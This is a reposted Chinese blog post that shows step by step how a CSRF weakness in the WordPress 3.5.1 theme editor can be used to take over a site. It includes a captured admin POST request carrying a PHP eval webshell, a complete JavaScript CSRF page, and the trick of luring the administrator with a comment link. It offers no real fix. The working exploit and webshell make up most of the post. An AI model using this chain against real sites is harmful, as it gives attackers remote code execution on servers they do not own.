最新消息:
    你的位置:jinglingshu的博客 > wordpress > wordpress后台CSRF不严,管理员访问某些链接可拿shell

    wordpress后台CSRF不严,管理员访问某些链接可拿shell

    wordpress admin 1831浏览 0评论

    wordpress3.5.1后台修改主题模版处防CSRF不严,前台评论可加入超链接,可写上诱惑性东西 骗取管理员点击后写入一句话木马
    进入后台-外观-编辑。选择编辑Twenty Twelve主题下的404.php文件。将原内容去掉,换成一句话木马,同时打开抓包工具。

    更新后抓到包

    post http://localhost/wp/wp-admin/theme-editor.php
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve
Cookie: wordpress_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7Cb875aa22d9bb88383aa6f9b1628dd86b; wp-settings-time-1=1364445495; comment_author_1233097993469c07c80a9cb529880b71=test; comment_author_email_1233097993469c07c80a9cb529880b71=632117384%40qq.com; wp-settings-1=editor%3Dhtml; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7C082956c79c01926f6f107ccd131dade7; s5wJ_2132_saltkey=uNFgCP80; s5wJ_2132_lastvisit=1364366389; s5wJ_2132_ulastactivity=591affdyS6zMRtF88Jad%2BTVr47oX95MIizEQOFn8RMF%2BN%2FpUUHdw
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 268
_wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=%3C%3Fphp+eval%28%24_GET%5Ba%5D%29%3B%3F%3E&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6

    由于本地演示,用AJAX进行CSRF攻击。

    编写localhost/wp.html文件。内容为

    <script>
function CreateRquest(){
var httpRequest;
try{
httpRequest=new ActiveXObject("Msxml2.XMLHTTP");
}catch(e){
try{
httpRequest=new ActiveXObject("Microsoft.XMLHTTP");
}catch(e1){
httpRequest=new XMLHttpRequest();
}
}
return httpRequest;
}
var request=CreateRquest();
request.open("post","http://localhost/wp/wp-admin/theme-editor.php",true);
request.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
var a="_wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=<?php eval($_GET[a]);?>&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6";
request.send(a);
</script>

    将被修改的404.PHP恢复,并且在前台评论写入<a href=”http://localhost/wp.html“>管理员,有一篇文章也讲到了这个问题

    管理员登录后台查看评论。点击链接后

    Twenty Twelve主题下的404.php已被成功修改为一句话木马

    访问一句话木马

    攻击成功,AJAX仅为演示,实战中可用JS控制表单自动提交来实现跨域传输数据。

    修复方案:

    你们比我懂

    转载请注明:jinglingshu的博客 » wordpress后台CSRF不严,管理员访问某些链接可拿shell

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址